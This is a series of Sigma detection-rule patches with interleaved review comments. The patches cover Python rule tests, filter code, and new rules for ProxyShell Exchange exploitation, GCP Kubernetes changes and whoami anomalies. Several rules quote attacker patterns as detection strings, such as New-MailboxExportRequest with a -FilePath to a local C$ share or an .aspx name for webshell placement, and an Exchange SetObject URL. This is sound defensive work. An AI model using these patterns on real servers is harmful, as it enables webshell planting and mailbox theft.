faulty_rules.append(file) + faulty_rules.append(file) elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") 
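Review bot: The `@@ -278,11 +278,11 @@` hunk reverts the `#rule-identification` anchor that the earlier `fix url ref` commit on this page added to the Specification link, and the hunks `@@ -346,9 +346,9 @@`, `@@ -363,13 +363,13 @@` and `@@ -495,7 +530,7 @@` do the same for `#status-optional`, `#level` and the title URL, where `SigmaHQ` additionally becomes `SimaHQ`. This looks like a commit built on a stale branch rather than an intended change; the URL strings should be restored to the anchored `SigmaHQ` form. The remaining edits in these hunks touch only whitespace on `faulty_rules.append(file)` lines and cannot be assessed from the collapsed text. The enclosing `TestRules` class starts outside the hunk.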
@@ -325,10 +325,10 @@ class TestRules(unittest.TestCase): if modifiedfield: if not isinstance(modifiedfield, str): print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) elif len(modifiedfield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") @@ -346,9 +346,9 @@ class TestRules(unittest.TestCase): if not status_str in valid_status: print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) faulty_rules.append(file) - + self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#status-optional)") + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") def test_level(self): faulty_rules = [] @@ -363,13 +363,13 @@ class TestRules(unittest.TestCase): level_str = self.get_rule_part(file_path=file, part_name="level") if not level_str: print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) elif not level_str in valid_level: print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) - faulty_rules.append(file) - + faulty_rules.append(file) + self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#level)") + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") def test_optional_fields(self): faulty_rules = [] 
@@ -410,6 +410,41 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + def test_optional_tlp(self): + faulty_rules = [] + valid_tlp = [ + "WHITE", + "GREEN", + "AMBER", + "RED", + ] + for file in self.yield_next_rule_file_path(self.path_to_rules): + tlp_str = self.get_rule_part(file_path=file, part_name="tlp") + if tlp_str: + # it exists but isn't a string + if not isinstance(tlp_str, str): + print(Fore.YELLOW + "Rule {} has a 'tlp' field that isn't a string.".format(file)) + faulty_rules.append(file) + elif not tlp_str.upper() in valid_tlp: + print(Fore.YELLOW + "Rule {} has a 'tlp' field with not valid value.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'tlp' fields. (https://www.cisa.gov/tlp)") + + def test_optional_target(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + target = self.get_rule_part(file_path=file, part_name="target") + if target: + # it exists but isn't a list + if not isinstance(target, list): + print(Fore.YELLOW + "Rule {} has a 'target' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'target' fields. (has to be a list of values even if it contains only a single value)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): 
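Review bot: `elif not tlp_str.upper() in valid_tlp:` in `test_optional_tlp` should use the membership idiom `elif tlp_str.upper() not in valid_tlp:`, matching `if key.lower() not in valid_logsource` elsewhere in this file. `test_optional_target` only checks that `target` is a list, so a list of non-string entries passes silently even though the failure message promises "a list of values"; a second branch such as `elif not all(isinstance(t, str) for t in target):` with its own message would make the test enforce what it describes. The enclosing `TestRules` class starts outside the hunk.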
@@ -445,7 +480,7 @@ class TestRules(unittest.TestCase): filename = os.path.basename(file) if not filename_pattern.match(filename) and not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is '[a-z0-9_]{10,70}\.yml' and it has to contain at least an underline character.") @@ -495,7 +530,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SimaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] 
@@ -514,32 +549,32 @@ class TestRules(unittest.TestCase): valide = False if not valid: faulty_rules.append(file) - + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") - - def test_selection_list_one_value(self): - faulty_rules = [] - for file in self.yield_next_rule_file_path(self.path_to_rules): - detection = self.get_rule_part(file_path=file, part_name="detection") - if detection: - valid = True - for key in detection: - if isinstance(detection[key],list): - if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term - print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - #valid = False - if isinstance(detection[key],dict): - for sub_key in detection[key]: - if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" - if len(detection[key][sub_key]) == 1: - print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) - #valid = False - if not valid: - faulty_rules.append(file) - - self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") - + + #deactivate because more than 170 rules have been corrected + # def test_selection_list_one_value(self): + # faulty_rules = [] + # for file in self.yield_next_rule_file_path(self.path_to_rules): + # detection = self.get_rule_part(file_path=file, part_name="detection") + # if detection: + # valid = True + # for key in detection: + # if isinstance(detection[key],list): + # if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + # print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) + # #valid = False + # if isinstance(detection[key],dict): + # for 
sub_key in detection[key]: + # if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" + # if len(detection[key][sub_key]) == 1: + # print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) + # #valid = False + # if not valid: + # faulty_rules.append(file) + # + # self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") def get_mitre_data(): """ diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index f3bc6feb..175f1284 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -30,6 +30,8 @@ class SigmaRuleFilter: self.minlevel = None self.maxlevel = None self.status = None + self.tlp = None + self.target = None self.logsources = list() self.notlogsources = list() self.tags = list() @@ -62,6 +64,10 @@ class SigmaRuleFilter: self.status = cond[cond.index("=") + 1:] if self.status not in self.STATES: raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond)) + elif cond.startswith("tlp="): + self.tlp = cond[cond.index("=") + 1:].upper() #tlp is allways uppercase + elif cond.startswith("target="): + self.target = cond[cond.index("=") + 1:].lower() # lower to make caseinsensitive elif cond.startswith("logsource="): self.logsources.append(cond[cond.index("=") + 1:]) elif cond.startswith("logsource!="): @@ -110,6 +116,24 @@ class SigmaRuleFilter: if status != self.status: return False + # Tlp + if self.tlp is not None: + try: + tlp = yamldoc['tlp'] + except KeyError: # missing tlp + tlp = "WHITE" # tlp is WHITE by default + if tlp != self.tlp: + return False + + #Target + if self.target: + try: + targets = [ target.lower() for target in yamldoc['target']] + except (KeyError, AttributeError): # no target set + return False + if self.target not in targets: + return False + # Log Sources if self.logsources: try: 
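Review bot: `test_selection_list_one_value` is disabled by commenting out its entire body, leaving about twenty lines of dead code in the test class; decorating the original method with `@unittest.skip("...")` keeps it collectable and records the reason in the test report. The comment `#deactivate because more than 170 rules have been corrected` reads as if the rules were already fixed; if the meaning is that 170+ rules would still have to be corrected first, say that in the skip reason. `valide = False` is still present as context at the top of the hunk (raised on the hunk that introduced it). The enclosing `TestRules` class starts outside the hunk.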
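Review bot: In the `@@ -110,6 +116,24 @@` hunk of `tools/sigma/filter.py`, `tlp = yamldoc['tlp']` is compared with `self.tlp`, which the parse hunk upper-cases, so a rule carrying `tlp: amber` never matches `tlp=amber` even though `test_optional_tlp` in this same commit accepts any case; normalise the rule side too, `tlp = str(yamldoc['tlp']).upper()`. The `tlp=` branch in `@@ -62,6 +64,10 @@` also does not validate the value the way `status=` is checked against `self.STATES`, so a typo such as `tlp=ambr` silently filters out every rule instead of raising `SigmaRuleFilterParseException`. For `target`, a scalar string value is iterated character by character by the list comprehension rather than reaching the `except (KeyError, AttributeError)` branch, so a `str` guard before the comprehension would make the fallback meaningful. The enclosing filter method starts outside the hunk.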
From 32fc1911636778530d3c86cc6240b63dc5cf3251 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 15:09:53 +0200 Subject: [PATCH 0299/1367] fix cs-uri-query and cs-uri-stem --- rules/web/web_cve_2021_26858_iis_rce.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index eaddf371..d630eafe 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -14,8 +14,8 @@ detection: selection: cs-method: 'POST' sc-status: 200 - cs-uri-stem|startswith: '/ecp/DDI/DDIService.svc/SetObject' - cs-uri-stem|contains|all: + cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject' + cs-uri-query|contains|all: - 'schema=Reset' - 'VirtualDirectory' cs-username|endswith: '$' From 1c919c07c77fccd8999825735ec2fe878122d4bf Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 11 Aug 2021 16:38:44 +0200 Subject: [PATCH 0300/1367] exchange mailbox export with generic keyword search (Message is not a real field) --- ...win_exchange_proxyshell_mailbox_export.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_mailbox_export.yml diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml new file mode 100644 index 00000000..c14cd44e --- /dev/null +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml 
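Review bot: `cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject'` is now an exact match; IIS resolves request paths case-insensitively, so whether this fires for a differently cased path depends on the backend's treatment of plain values, which is not visible here. If the backend cannot be assumed to fold case, record the expectation in the rule's `definition` or use a modifier whose case handling is known for that backend. Moving `schema=Reset` and `VirtualDirectory` under `cs-uri-query|contains|all` is the right field for query parameters.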
@@ -0,0 +1,30 @@ +title: Mailbox Export to Exchange Webserver +id: 60685ef9-ad8b-4dba-af27-841a2a25489c +status: experimental +description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it +references: + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Christian Burkard +date: 2021/08/10 +logsource: + service: msexchange-management + product: windows +detection: + export_command: + - 'New-MailboxExportRequest' + - ' -Mailbox ' + export_params: + - '-FilePath "\\localhost\C$' + - '-FilePath "\\127.0.0.1\C$' + - '.aspx' + role_assignment: + - 'New-ManagementRoleAssignment' + - ' -Role "Mailbox Import Export"' + - ' -User ' + condition: (all of export_command and export_params) or role_assignment +falsepositives: + - unlikely +level: critical +tags: + - attack.persistence + - attack.t1505.003 From a880663d51998f89cdbffc95ce00fe49d5d27397 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 11 Aug 2021 17:46:10 +0200 Subject: [PATCH 0301/1367] fix: add missing 'all of' for 'and' conjunction of the assignment keywords --- rules/windows/other/win_exchange_proxyshell_mailbox_export.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml index c14cd44e..886f7318 100644 --- a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml @@ -21,7 +21,7 @@ detection: - 'New-ManagementRoleAssignment' - ' -Role "Mailbox Import Export"' - ' -User ' - condition: (all of export_command and export_params) or role_assignment + condition: (all of export_command and export_params) or all of role_assignment falsepositives: - unlikely level: critical 
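Review bot: The UNC prefixes in `export_params` may not match the real share path: under Sigma's value-escaping rules a doubled backslash that is not followed by a wildcard denotes a single literal backslash, so `'-FilePath "\\localhost\C$'` is, for a spec-conformant backend, the string `"\localhost\C$` and would miss `\\localhost\C$` as it appears in the MSExchange Management log. If that is how the target backends behave, the intended form is `'-FilePath "\\\\localhost\C$'` and `'-FilePath "\\\\127.0.0.1\C$'`; this is worth confirming against the generated query before the rule goes out at `level: critical`. A short comment next to those two entries explaining the escaping choice would stop the next editor from "fixing" it back.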
From 4aec212e08566212d5310f13491cc2ed68985f63 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:24:15 -0500 Subject: [PATCH 0302/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index c6da9214..3059bced 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -14,7 +14,7 @@ logsource: service: gcp.audit detection: selection: - eventName: + gcp.audit.method_name: - io.k8s.authorization.rbac.v*.clusterrolebindings.create - io.k8s.authorization.rbac.v*.rolebindings.create - io.k8s.authorization.rbac.v*.clusterrolebindings.patch From 9b9d3c28c787952ea29389cd23c85e6ce439ced5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:24:40 -0500 Subject: [PATCH 0303/1367] Update gcp_kubernetes_secrets_modified_or_deleted.yml --- rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml index 8b78f993..ba63cc98 100644 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: gcp.audit detection: selection: - eventName: + gcp.audit.method_name: - io.k8s.core.v*.secrets.create - io.k8s.core.v*.secrets.update - io.k8s.core.v*.secrets.patch From ae85bf2b28873009ebf0dec4183a6248d19485d4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:26:14 -0500 Subject: [PATCH 0304/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
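Review bot: `gcp.audit.method_name` appears to be an Elastic/Filebeat ECS-style field name rather than the native Cloud Audit Log field, which is `protoPayload.methodName`; Sigma rules are meant to carry the source's own field and leave pipeline-specific renames to the backend field-mapping config, otherwise every non-Elastic consumer has to rewrite the rule. If generic GCP audit logs are the intent, `protoPayload.methodName:` in the rule with the `gcp.audit.method_name` mapping placed in the Elastic config is the conventional split. The `v*` wildcards in the values also assume the field is treated as a wildcard-capable string by every backend; if that was only verified against one, say so in the description.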
diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index 3059bced..b3c148c5 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -1,7 +1,7 @@ title: Google Cloud Kubernetes RoleBinding id: 2f0bae2d-bf20-4465-be86-1311addebaa3 description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/09 references: From 22d672187c78f50d64191cc7787293b66d8bdeae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:26:32 -0500 Subject: [PATCH 0305/1367] Update gcp_kubernetes_secrets_modified_or_deleted.yml --- rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml index ba63cc98..c2bf97bf 100644 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Kubernetes Secrets Modified or Deleted id: 2f0bae2d-bf20-4465-be86-1311addebaa3 description: Identifies when the Secrets are Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/09 references: From 7ba375dea07cea8d3135282bc2837563c91420d6 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 11 Aug 2021 18:00:09 +0100 Subject: [PATCH 0306/1367] Optimising lists/subexpressions with length 1 Should reduce brackets on some output targets --- tools/sigma/backends/base.py | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..08d29b4b 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py 
@@ -277,6 +277,9 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: @@ -285,7 +288,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateListNode(self, node): if not set([type(value) for value in node]).issubset({str, int}): raise TypeError("List values must be strings or numbers") - return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + result = [self.generateNode(value) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + return self.listExpression % (self.listSeparator.join(result)) def generateMapItemNode(self, node): fieldname, value = node From b144523ad2023bc6ef3a207430524ce0dd2bea32 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 22:37:01 +0200 Subject: [PATCH 0307/1367] fix duplicate id --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index b3c148c5..58eaad19 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -1,5 +1,5 @@ title: Google Cloud Kubernetes RoleBinding -id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. author: Austin Songer @austinsonger status: experimental 
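Review bot: The `len(node.items) == 1` shortcut in `generateSubexpressionNode` drops the `subExpression` wrapper, but that wrapper exists for operator precedence, not only for cosmetics: if the single item is itself a compound node (the OR inside `a and (b or c)`), returning it unwrapped yields `a and b or c`. Whether a one-element `items` can hold a compound node depends on the parser, which is outside this hunk; if it can, the check should also require a leaf, e.g. only collapse when `node.items[0]` is a plain value or single map item and not a ConditionAND/ConditionOR node. A one-line comment stating that assumption (`# safe only because a 1-item subexpression is always a leaf`) would at least make it auditable.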
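Review bot: Returning the bare element for a one-value list in `generateListNode` changes output for any backend whose `mapListValueExpression` relies on the list form supplying its own delimiters — a SQL-style `%s IN %s` pairing with `listExpression = "(%s)"` would now emit `field IN 'x'` without parentheses, which is not valid. Since this mixin is shared by many backends, the collapse should be opt-in, e.g. a class attribute `collapseSingleValueList = False` here that the text-query backends set to `True`, and the early return guarded by `if len(result) == 1 and self.collapseSingleValueList:`. The comment on the new branch should also say why a one-element list is safe to flatten for the backends that enable it.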
From 08883c8e3277667ccdba5ff1a2d6648520577bc1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 09:27:50 +0200 Subject: [PATCH 0308/1367] refactor: removed old rule that uses Message field Rules that use the "Message" field are prone to localisation issues and should be avoided whenever possible. We can build what we call "keyword" rules in these cases and simply combine string values that are searched in the raw data as 1 of them or all of them. (see specs for details) --- ...win_exchange_proxyshell_mailbox_export.yml | 7 +++-- .../win_exchange_proxyshell_mailboxexport.yml | 30 ------------------- 2 files changed, 4 insertions(+), 33 deletions(-) delete mode 100644 rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml index 886f7318..a16911e3 100644 --- a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml @@ -1,11 +1,12 @@ title: Mailbox Export to Exchange Webserver -id: 60685ef9-ad8b-4dba-af27-841a2a25489c +id: 516376b4-05cd-4122-bae0-ad7641c38d48 status: experimental description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html -author: Christian Burkard -date: 2021/08/10 +author: Florian Roth, Rich Warren, Christian Burkard +date: 2021/08/09 +modified: 2021/08/11 logsource: service: msexchange-management product: windows diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml deleted file mode 100644 index 335ad125..00000000 
--- a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml +++ /dev/null @@ -1,30 +0,0 @@ -title: ProxyShell MSExchange MailBox Export Pattern -id: 516376b4-05cd-4122-bae0-ad7641c38d48 -status: experimental -description: Detects specific patterns found after a successful ProxyShell exploitation in relation to a Commandlet invokation of New-MailboxExportRequest -references: - - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html?m=1 -author: Florian Roth, Rich Warren -date: 2021/08/09 -logsource: - product: windows - service: msexchange-management -detection: - selection_cmdlet: - Message|contains|all: - - 'New-MailboxExportRequest' - - ' -Mailbox ' - selection_params: - Message|contains: - - '-FilePath "\\localhost\C$' - - '-FilePath "\\127.0.0.1\C$' - - '.aspx' - selection_assignment: - Message|contains|all: - - 'New-ManagementRoleAssignment' - - ' -Role "Mailbox Import Export"' - - ' -User "exchange.admin"' - condition: selection_cmdlet and selection_params or selection_assignment -falsepositives: - - Unlikely -level: critical \ No newline at end of file From 852d7a8b228f712c399bfae47ae79949621aad63 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 10:11:17 +0200 Subject: [PATCH 0309/1367] fix: typo in description --- rules/web/web_exchange_proxyshell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index e9017771..97c00b76 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml 
@@ -1,7 +1,7 @@ title: Exchange ProxyShell Pattern id: 23eee45e-933b-49f9-ae1b-df706d2d52ef status: experimental -description: Detects URP patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) +description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html From bd0a2a1b9fc2e6bb9eba75df0b3684e9d31d9fa8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 13:27:51 +0200 Subject: [PATCH 0310/1367] rule: renamed whoami --- .../process_creation/win_renamed_whoami.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/win_renamed_whoami.yml diff --git a/rules/windows/process_creation/win_renamed_whoami.yml b/rules/windows/process_creation/win_renamed_whoami.yml new file mode 100644 index 00000000..25cd21fc --- /dev/null +++ b/rules/windows/process_creation/win_renamed_whoami.yml @@ -0,0 +1,25 @@ +title: Renamed Whoami Execution +id: f1086bf7-a0c4-4a37-9102-01e573caf4a0 +status: experimental +description: Detects the execution of whoami that has been renamed to a different name to avoid detection +references: + - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ + - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ +author: Florian Roth +date: 2021/08/12 +tags: + - attack.discovery + - attack.t1033 + - car.2016-03-001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'whoami.exe' + filter: + Image|endswith: '\whoami.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: critical From 34d70de084df553ebb76f863eea0f65a566d7821 Mon Sep 17 00:00:00 2001 
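Review bot: The rule hinges entirely on `OriginalFileName`, a PE version-resource field that only richer process-creation sources (Sysmon, most EDR agents) populate; on plain Security 4688 telemetry `selection` never matches and the rule goes quiet with no signal. That dependency, and the fact that an attacker who also rewrites the version resource is not covered, belongs in the rule text, e.g. extend `description:` with `Requires a process-creation source that supplies OriginalFileName (e.g. Sysmon Event ID 1); a binary whose version resource was also edited is not detected.` With `level: critical` and `falsepositives: Unknown`, a sentence on the expected noise source (administration toolkits that ship whoami.exe under another name) would also help triage.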
From: Florian Roth Date: Thu, 12 Aug 2021 13:28:00 +0200 Subject: [PATCH 0311/1367] rule: whoami anomalies --- .../win_susp_whoami_anomaly.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_whoami_anomaly.yml diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml new file mode 100644 index 00000000..62184377 --- /dev/null +++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml @@ -0,0 +1,35 @@ +title: Whoami Execution Anomaly +id: 8de1cbe8-d6f5-496d-8237-5f44a721c7a0 +status: experimental +description: Detects the execution of whoami with suspicious parents or parameters +references: + - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ + - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ +author: Florian Roth +date: 2021/08/12 +tags: + - attack.discovery + - attack.t1033 + - car.2016-03-001 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\whoami.exe' + filter: + ParentImage|endswith: + - '\cmd.exe' + - '\powershell.exe' + selection_special: + CommandLine|contains: + - 'whoami -all' + - 'whoami /all' + - 'whoami.exe -all' + - 'whoami.exe /all' + condition: ( selection and not filter ) or selection_special +falsepositives: + - Admin activity + - Scripts and administrative tools used in the monitored environment + - Monitoring activity +level: high From d9d543e545bec517a2cd9b24b99d542e077b92ee Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 13:28:24 +0200 Subject: [PATCH 0312/1367] refactor: removed OriginalFileName from rule to improve compatibilty --- rules/windows/process_creation/win_susp_whoami.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) 
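Review bot: The `filter` is the allow-list side of this rule, yet it only checks that the parent path ends in `\cmd.exe` or `\powershell.exe`, so a shell dropped into a writable location (`C:\Users\Public\cmd.exe`) is excused exactly like the system binary. Allow-lists should be at least as strict as the detection they suppress; anchor them to the full paths, e.g. `- 'C:\Windows\System32\cmd.exe'` together with its SysWOW64 and `WindowsPowerShell\v1.0\powershell.exe` counterparts. Whether `pwsh.exe` parents are meant to alert (they are not in the filter) should be stated in the description either way.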
